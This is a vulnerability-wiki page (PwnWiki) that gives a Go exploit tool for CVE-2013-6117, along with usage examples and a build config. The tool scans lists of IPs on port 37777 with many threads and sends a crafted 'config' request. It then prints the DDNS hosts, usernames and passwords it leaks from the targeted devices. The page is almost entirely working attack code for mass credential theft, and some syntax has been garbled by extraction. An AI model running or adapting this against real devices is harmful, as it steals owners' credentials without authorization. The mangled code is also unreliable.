PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
Usage
$ ./CVE-2013-6117 -h Options: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads (default: 100)
$ ./CVE-2013-6117 -f hostfile.txt 1.2.4.4|name.no-ip.org:80|username|password
$ ./CVE-2013-6117 -t 1.2.3.4 1.2.4.4|name.no-ip.org:80|username|password
CVE-2013-6117.go
package main
import (
"net"
"os"
"strings"
"fmt"
"sync"
"bufio"
"time"
"github.com/mkideal/cli"
)
func readLines(path string) (string, error) {
file, err := os.Open(path)
if err != nil {
return nil, err
}
defer file.Close()
var lines string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
return lines, scanner.Err()
}
func getData(servAddr string,data string) {
tmpResult:=data
if strings.Contains(tmpResult, "&&G4-IP DDNS&&"){
s := strings.Split(tmpResult, "&&G4-IP DDNS&&")
if len(s)>0 {
s := strings.Split(tmpResult, "&&G4-IP DDNS&&")1
s1 := strings.Split(s, "&&")
tmpip:=s10
tmpport:=s11
ddns:=tmpip+":"+tmpport
tmpusername:=s13
tmppassword:=s14
if len(tmpusername)>0 {
fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
}
}
}
if strings.Contains(tmpResult, "&&NO-IP DDNS&&"){
s := strings.Split(tmpResult, "&&NO-IP DDNS&&")
if len(s)>0 {
s := strings.Split(tmpResult, "&&NO-IP DDNS&&")1
s1 := strings.Split(s, "&&")
tmpip:=s10
tmpport:=s11
ddns:=tmpip+":"+tmpport
tmpusername:=s13
tmppassword:=s14
if len(tmpusername)>0 {
fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
}
}
}
if strings.Contains(tmpResult, "&&Dyndns DDNS&&"){
s := strings.Split(tmpResult, "&&Dyndns DDNS&&")
if len(s)>0 {
s := strings.Split(tmpResult, "&&Dyndns DDNS&&")1
s1 := strings.Split(s, "&&")
tmpip:=s10
tmpport:=s11
ddns:=tmpip+":"+tmpport
tmpusername:=s13
tmppassword:=s14
if len(tmpusername)>0 {
fmt.Println(servAddr+"|"+ddns+"|"+tmpusername+"|"+tmppassword)
}
}
}
}
func connect(urlChan chan string) {
for servAddr := range urlChan {
strEcho := "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
tcpAddr, err := net.ResolveTCPAddr("tcp", servAddr+":37777")
if err == nil {
var timeoutSec=5
timeout := time.Duration(time.Duration(timeoutSec) * time.Second)
d := net.Dialer{Timeout: timeout}
conn, err := d.Dial("tcp", servAddr+":37777")
if err == nil {
_, err = conn.Write(byte(strEcho))
if err == nil {
reply := make(byte, 1024)
_, err = conn.Read(reply)
if err == nil {
getData(servAddr,string(reply))
}
}
conn.Close()
}
}
_=tcpAddr
}
}
type argT struct {
cli.Helper
Filename string `cli:"f,filename" usage:"File containing list of IP addresses"`
Targetip string `cli:"t,target" usage:"Target IP"`
Threads int `cli:"n,threads" usage:"No of concurrent threads (default: 100)"`
}
func main() {
var workersCount=100
var contentList string
cli.Run(new(argT), func(ctx *cli.Context) error {
argv := ctx.Argv().(*argT)
if len(argv.Filename)>0 {
lines, err2 := readLines(argv.Filename)
if err2==nil {
for _, v := range lines {
v=strings.TrimSpace(v)
if len(v)>0 {
contentList = append(contentList, v)
}
}
} else {
fmt.Println(err2)
}
_ = err2
}
if argv.Threads>0 {
workersCount=argv.Threads
}
if len(argv.Targetip)>0 {
contentList = append(contentList, argv.Targetip)
}
return nil
})
urlChan := make(chan string)
var wg1 sync.WaitGroup
wg1.Add(workersCount)
for i := 0; i < workersCount; i++ {
go func() {
defer wg1.Done()
connect(urlChan)
}()
}
completed := 0
for _, each := range contentList {
urlChan <- each
completed++
}
close(urlChan)
wg1.Wait()
}
goreleaser.yml
build:
main: ./CVE-2013-6117.go
goos:
- linux
- darwin
- windows
goarch:
- 386
- amd64
- arm
- arm64
brew:
github:
owner: milo2012
name: homebrew-tap
folder: Formula
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
